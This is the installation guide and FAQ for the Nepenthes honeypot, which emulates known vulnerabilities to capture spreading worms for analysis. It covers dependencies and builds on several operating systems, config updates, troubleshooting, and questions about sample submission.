Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate _known_ vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to

• resolve dns asynchronous
• emulate vulnerabilities
• download files
• submit the downloaded files
• trigger events (sounds abstract and it is abstract but is still quite useful)
• shellcode handler

Refer to for more information about the Module Interface.

Nepenthes vulnerability modules require knowledge about weaknesses so one can draft a Dialogue how the virus will exploit the weakness, gain the needed information to download the file and send the attacker just enough information he does not notice he gets fooled.
On the other hand Nepenthes is quite usefull to capture new exploits for old vulnerabilities.
As Nepenthes does not know these exploits, they will appear in the logfiles.
By running these captures against a real vulnerable machine one can gain new information about the exploit and start writing an Nepenthes Dialogue.

The first argument is, its free. The software is free, the viruses you can capture are free. You can collect this annoying stuff like stamps without paying a diam. The rest of the arguments are security related an discussable. Setting up a host running Nepenthes can improve network security drastically, as you can see who scans for which known vulnerabilities.

If you update an existing install, please read this, else you may miss something and screw your install.

Check the download section before trying to compile nepenthes from source, there are prebuild or preconfigured packages for

• gentoo
• debian
• FreeBSD
• OpenBSD

Nepenthes will use automake to verify your system satisfies the needed depencies.

required:

• g++ do not use g++ 4.0.* it wont work properly) (g++ 4.0.2 may work ) 2.9? wont work too, as these versions are not c99 compatible
• libcurl
• libmagic
• libpcre
• libadns
• flex and bison (or lex and yacc, if possible use flex/bison). Note that these tools are probably already installed on most systems.

optional:

• general
  • libcap library to use linux kernel capabilities
• module-honeytrap
  • libpcap packet capture library
  • iptables iptables (on linux only)
    • CONFIG_IP_NF_QUEUE=y/m in your kernel
  • ipfw and divert sockets on FreeBSD
    • “options IPDIVERT # divert.ko modulie”
    • “options IPFIREWALL # ipfw”

apt-get install  libcurl3-dev libmagic-dev libpcre3-dev libadns1-dev libpcap0.8-dev iptables-dev

SuSE (10) needs you to

apt-get install libadns 
apt-get install libadns-devel  
apt-get install file-devel
apt-get install pcre-devel 
apt-get install pcre
apt-get install curl 
apt-get install curl-devel

and once again the single line for easy pasting

apt-get install libadns libadns-devel file-devel pcre-devel pcre curl curl-devel

: find out the packages names for pcap & iptables-dev on SuSE

pretty easy again.

yum install pcre-devel pcre adns adns-devel curl curl-devel file

: find out the packages names for pcap & iptables-dev on FC

Nepenthes v0.2.0 under FC6 you need:

Base install (ie core package group only)

yum update
yum install subversion automake libtool flex bison gcc gcc-c++ curl curl-devel pcre pcre-devel adns adns-devel file libpcap libpcap-devel iptables-devel

You need to install updated autotools with darwinports:

sudo port install libtool  # libtoolize
sudo port install autoconf
sudo port install automake

Install the dependencies as well:

sudo port install adns
sudo port install pcre
sudo port install file  # for libmagic
sudo port install curl

Installing the depencies from ports

dns/adns
ftp/curl
devel/pcre

worked for me

In order to run Nepenthes on OpenBSD you should be running 4.0 or later. You can use ports or packages.

If you choose to use ports, you will build Nepenthes from source. Assuming you have the ports tree checked out in /usr/ports, proceed with:

shell> cd /usr/ports/net/nepenthes
shell> make
shell> sudo make install

If you want to know how to fetch the ports tree, take a look at: http://www.openbsd.org/anoncvs.html

If you choose to use packages (pre-compiled binaries), you should fetch libmagic-4.23.tgz and nepenthes-0.2.2.tgz from:

ftp://ftp.openbsd.org/pub/OpenBSD/<release>/packages/<arch>/

<release> should be replaced by the number of the release you’re running (3.9, 4.0, etc) or by ‘snapshots’ if you’re running current.

<arch> should be replaced by the architecture you wish to install Nephentes on (i386, sparc64, etc). This port is known to work on the following archs, i386, amd64, sparc64 and macppc.

and then install with:

shell> sudo pkg_add libmagic-4.23.tgz
shell> sudo pkg_add nepenthes-0.2.2.tgz

If there are any issues, please contact the port maintainer.

Installing the depencies adns curl pcre file from pkg worked for me

Compiling nepenthes >= 0.1.6 on windows using cygwin is possible . Installing

• autoconf2.5
• automake1.9
• bzip2
• curl-devel
• file
• gcc-core 3.3.3-3
• gcc-g++ 3.3.3-3
• gzip
• inetutils
• libcurl3
• libtool1.5
• make
• openssl-devel
• pcre-devel
• tar
• wget
• zlib

from cygwin worked for me. Some packages will install its specific depencies.

Get it

wget http://www.chiark.greenend.org.uk/~ian/adns/adns.tar.gz

unpack it

tar xfz adns.tar.gz
cd adns-1.1

configure & compile

./configure --prefix=/usr
make

this will fail when linking the adns client, we have to copy the created library by hand

cd dynamic 
cp libadns.so libadns.dll
cd ..
make

for d in src dynamic client regress; do make -C $d install; done
cp dynamic/libadns.dll /bin/libadns.dll

Now adns needs the /etc/resolv.conf file we have to create it, first check your nameservers ip

ipconfig /all | grep DNS-Server

will give you something like

DNS-Server. . . . . . . . . . . . : 194.25.2.129

I recommend you use your real nameserver and not just take this examples values.

echo nameserver 194.2.25.129 > /etc/resolv.conf

adnshost kernel.org

kernel.org A INET 204.152.191.5
kernel.org A INET 204.152.191.37

You can download a source package, or get the latest code from the svn repository.

Svn will offer the latest version, but may not build properly, have bugs, requires some additional time reading the install guide, and additional software.

If you think you can handle it, we recommend using svn, if you hit a bug, you can help us fixing it by filing a bug report. But using svn is not that easy, as the svn snapshot does not contain preconfigured autoconf files, you have to create them yourself with the help of

• libtool (1.5.20)
  • libtoolize
• automake (1.9.6)
  • aclocal
• autoconf (2.59)
  • autoheader

Some operating systems (FreeBSD 6.0 for example) ship broken autotools, I was unable to get the shipped autotools create the required files, so using svn may be tricky on some operating systems.
Others (debian for example) make using autotools very easy

apt-get install autoconf automake1.9 autotools-dev libtool

For more information about autoconf I can recommend the autoconf docs.

if you “svn checkout” a repository, you can update this checkout incremental with “svn update”, so you don’t need to download the complete source again when just some lines were changes.

“svn export” does not allow incremental updates, but uses less diskspace as an export, as the export stores some additional data (local private copy of the whole source).

So whatever you want to run, its up to you.

svn checkout https://svn.mwcollect.org/nepenthes/trunk/ nepenthes
cd nepenthes

Now we have to run the famous autotools to get the “./configure” file we’ll need to install it.

autoreconf -v -i --force

What happens when doing this is ... sometimes a picture says more than words.

configure.ac --.
               |   .------> autoconf* -----> configure
[aclocal.m4] --+---+
               |   `-----> [autoheader*] --> [config.h.in]
[acsite.m4] ---'

(taken from the autoconf 2.57 manual)

the configure on the right side indicates we get this as a result.

/opt/local/bin/autoreconf -v -i --force

As you can imagine, this does not work everywhere, FreeBSD is special, that special that I was unable to autoreconf svn on a FreeBSD host myself for a long time, that special that I had no real motivation looking for it, as everything automake depended really sucks .....

But today I got mail, mail how to get it working on FreeBSD.

For what it's worth, here's what I did to build the current SVN code on
FreeBSD 6.0. I thought we might want to add this to the wiki:

# -- checkout code && cd to src directory --
# /usr/local/bin/libtoolize --copy --force
# /usr/local/bin/aclocal19 --force
# cat /usr/local/share/aclocal/libtool.m4 >>aclocal.m4
# /usr/local/bin/autoheader259 --force
# /usr/local/bin/automake19 -ai
# /usr/local/bin/autoconf259 -f
# ./configure
# make

I'm sure this isn't the minimal set of operations, but it works ;)

Check the projects file releases repository on sourceforge and download the latest version.

Unpack your source tarball.

if you got a bzip2 package use

 
tar vxjf nepenthes-VERSION.tar.bz2

else

 
tar vxzf nepenthes-VERSION.tar.gz

from time to time things show up, that have to be fixed

patches are run against /, so you can apply them with

cd nepenthes-VERSION
cat ../example_patch.diff | patch -p0

you need them as we did mistakes :\

• nepenthes 0.1.3 logging path patch
• nepenthes 0.1.3 download-nepenthes connection close patch

patches that add additional features, we recommend them

• nepenthes 0.1.3 advanced xor and bindshell patch ( highly recommended )

• mydoom & bagle endless loop patch required
• shellcode-signature yacc namespacing to prevent collision when using prelude optional/required when using prelude

Starting with 0.1.6 every depencie can be resolved with its own specific path. If you got everything in its normal path (we ignore FreeBSDs definition of normal path here), you won’t need this, but if you need it, you dont want to miss it.

For example

./configure \
--with-curl-include=/opt/curl/include/ \
--with-curl-lib=/opt/curl/lib/ \
--with-adns-include=/opt/adns/include/ \
--with-adns-lib=/opt/adns/lib/ \
--with-pcre-include=/opt/pcre/include/  \
--with-pcre-lib=/opt/pcre/lib/ \ 
--with-magic-include=/opt/file/include/ \
--with-magic-lib=/opt/file/lib/ \
--prefix=/opt/nepenthes

check

./configure --help 

If you rely on user defined pathes.

This worked for debian, Fedora Core 4 and SuSE 10 for me.

./configure --prefix=/opt/nepenthes
make
make install

./configure \
--libdir=/opt/local/lib \
--includedir=/opt/local/include/ \
--prefix=/opt/nepenthes

make
make install

Some depencies ( curl, pcre ) hide in /usr/pkg/, so we have to include this path, including the path once is enough.

./configure --prefix=/opt/nepenthes \
--with-curl-include=/usr/pkg/include --with-curl-lib=/usr/pkg/lib

make
make install

If you choose to use ports, you will build Nepenthes from source. Assuming you have the ports tree checked out in /usr/ports, proceed with:

shell> cd /usr/ports/net/nepenthes
shell> make
shell> sudo make install

If you want to know how to fetch the ports tree, take a look at: http://www.openbsd.org/anoncvs.html

cygwin g++ is a little special, won’t compile the sourc out of the box, so we have to tweak it.

./configure --prefix=/opt/nepenthes --with-adns-lib=/bin
make

this *will* quit with

/usr/lib/gcc/i686-pc-cygwin/3.4.4/include/c++/bits/stl_uninitialized.h: In membe
r function `virtual int32_t nepenthes::VFSCommandCMD::run(std::vector<std::string, std::allocator<std::string> >*)':
/usr/lib/gcc/i686-pc-cygwin/3.4.4/include/c++/bits/stl_uninitialized.h:82: warning: '__cur' might be used uninitialized in this function
make[3]: *** [VFSCommandCMD.lo] Error 1
make[3]: Leaving directory `/home/foobar/Svn/nepenthes/trunk/modules/shellemu-winnt'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/foobar/Svn/nepenthes/trunk/modules'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/foobar/Svn/nepenthes/trunk'
make: *** [all] Error 2

actually this is not nepenthes fault, but cygwins g++, and the error is not critical, it just fails as the compiler wants to warn us about a *possible* problem, and the Makefile.am says -Werror ( handle warnings as errors )

So, open modules/shellemu-winnt/Makefile.am with editor of your choice, and change

AM_CXXFLAGS = -Wall -Werror

to

AM_CXXFLAGS = -Wall

this will still show the warning, but won’t treat it as error any longer.

then finish it

make
make install

cd /opt/nepenthes

less etc/nepenthes/nepenthes.conf

less etc/nepenthes/submit-norman.conf

less etc/nepenthes/log-irc.conf

’less’ means you should have a look in the config file, and edit it using an editor of your choice.

If something fails, check the Trouble Shooting section. Compiling nepenthes can take some time, here it takes 1:20 minutes on an amd64 3500 cpu with one gb ram.

nepenthes won’t overwrite your existing config files on make install that means if you update to a new version, and don’t care about updating the configs, you may break your install.

As of 0.1.7 there is a real need to do this.

There are at least 2 ways of verifiying your config works

If you run the default config without any changes, just remove the etc/nepenthes dir, and make install again, it will copy all new versions of all config files.

this is the way to go if you tweaked your config.

get this shellscript, and call it like

./diffconfigs.sh /tmp/nepenthes-0.1.7 /opt/nepenthes

#!/bin/sh
 
SRCDIR=$1
INSTALLDIR=$2/etc/nepenthes
 
for i in $(find $SRCDIR | grep conf.dist$ | grep -v svn); 
  do CFGNAME=$( basename $i| sed "s/\.dist$//");
  THEDIFF=$(diff $i $INSTALLDIR/$CFGNAME);
  DIFFLINES=$(echo $THEDIFF | wc -c) 
  if [ $DIFFLINES -gt 1 ]; then
    echo -e "\x1b[31mdiff $i $CFGNAME ($DIFFLINES bytes difference) \x1b[0m"; 
    diff $i $INSTALLDIR/$CFGNAME
  fi
done

If everything went fine, run nepenthes.

bin/nepenthes

All in all Nepenthes is stable code,
but some things are ... lets say a little raw
Current status is everything which is marked “work”ing runs fine.

status: works

description:

provides a windows nt shell supporting all commands one needs to download a file.

Refer to the online doxygen documentation of the eXample modules on .

Post suggestions, bugs, patches, new modules to nepenthes.sf.net or mail them to nepenthesdev@gmail.com
If you want to donate hardware, ipranges, whatever, mail us.

P: It does not work!
S: find out why it does not work

P: the makefiles suck
S: send us a patch using the auto(conf|make) foobar we are unable to use.

P: compiling fails
S: google for it, if this does not help out, file a bugreport and mention your
    - operating system version
    - g++ version
    - libcurl version
    - libpcre version
    - libmagic version
   and paste the compilererror too.

P: nepenthes leaks memory
S: first verify it _is_ a memoryleak
   currently all files downloaded are kept in memory until they are downloaded and submittet.
   then
   run nepenthes with      
   valgrind --num-callers=12 --tool=memcheck --leak-check=yes --leak-resolution=high --show-reachable=yes -v  --logfile=valg bin/nepenthes
   and mail us the valgrind logfiles to nepenthesdev@gmail.com
   or
   fix the memleak and post the patch to http://sf.net/projects/nepenthes

P: i dont have any connection incoming!
S: verify you are not firewalled.     

Q: Is this the official FAQ?
A: Yes.

Q: Why choose Nepenthes as the name?
A: read http://en.wikipedia.org/wiki/Nepenthes 

Q: What do you do with the samples committed to the nepenthes central server?
A: We collect them.
   All samples are committed to clamav.
   Some samples get analysed.

Q: Can I get access to your malware database?
A: In general No.
   If you think you will be able to persuade us that you should have access as you are an AV product vendor, 
   or do research in this field, mail us at samples@stargazer.at
   Currently we _lack_ hardware and connection for a central server.

Q: I want to write my own modules, will you publish them?
A: Depends. If the module adds new features 
   - shellcodehandler
   - downloadhandler
   - submithandler
   - vulnerability module
   and you are willing to accept the gpl license, there is a really good chance that we will.
   Of course, the feature also has to be useful.
   Submitting files to /dev/null can't be considered a good feature.

Q: Why don't you write the whole documentation in english?
A: Although we know our English is poor, we think it's more useful to write poor English 
   than to write good Russian.
   Send us patches fixing this issue.

Q: is autocommiting files to sandbox.norman.no not a bad idea?
A: so far we have committed about 400 files and nobody has complained yet.
   and we like getting the results via mail.

Q: how can i autocommit to clamav?
A: clamav does not want to be the victim of autocommits
   if you use the submit-nepenthes, our central server will commit the files for you.

Q: how can i see whether the file i submitted to your central server has got a clamav signature?
A: wait some time and then scan the file using clamscan

Q: why should i run nepenthes?
A: you improve security in various ways which we can discuss over a beer.

Q: there is nothing in the cvs repository on sourceforge.net
A: we use svn as we don't like cvs 

Q: can i get access to the svn?
A: so far no as the svn is 'hosted' on a dialup.

Q: i get 
   Got signal 25
   Exit 'cause of 25
A: signal 25 is SIGFSZE, that means filesize exceeded, and mainly referrs to the logfiles 
   located in log/, rm them, rotate them, just get rid of it, and it will work again, fixed in 0.1.1

Q: my avscanner complains about a virus in the nepenthes source package.
   like:
   clamscan nepenthes-0.1.1.tar.gz: Trojan.Downloader.FTP.Gen-4 FOUND
A: actually this is not a false positive, but on the other hand it is a false positive ...
   the tarball contains a file in doc/README.VFS containing wide used batchjobs viri use to download and execute themselves
   on a remotehost once the gained a shell for documentation purposes.
   so your virusscanner is cool if he recognizes the file as a virus, but this single file does not make nepenthes a virus.
   as we dont want to sap av scanners we wont ask them to remove this signature.

   in my opinion the signature is very good, using such av  signature on a snort_inline firewall can stopp attacks in the 
   last state, after successfull exploitation, before infecting the host.

Q: whats the problem with g++ 4.0.1?
A: it will compile, and maybe even start, but it will fail if you resolve dns async.
   for some reason the destructor of list<unsigned long> segfaults the programm.
   to me this is a g++ 4 bug.

Q: what about OS X, or _any_ other big endian architecture?
A: we guess it will compile, but we never had a look on endianess in any shellcodehandler.
   actually we can't say if it will work on big endian boxes, and as we do not own any big endian machine, we cant debug&fix it.
   if you want to donate a osx box so we can support big endian, mail us for a delievery address.

Q: Nepenthes fails to start and gives the error message
   [ crit mgr module ] Failed to load library "lib/nepenthes/shellcodesignatures.so": lib/nepenthes/shellcodesignatures.so: undefined symbol: yytext
A: Make sure you've installed flex and bison (or lex and yacc). If you don't have them both, delete the following files
    - modules/shellcode-signatures/signature_scanner.c
    - modules/shellcode-signatures/signature_parser.h
    - modules/shellcode-signatures/signature_parser.c
   Afterwards install flex and bison and re-run ./configure, recompile and pray. If this didn't fix your problem, contact us on the mailing list please.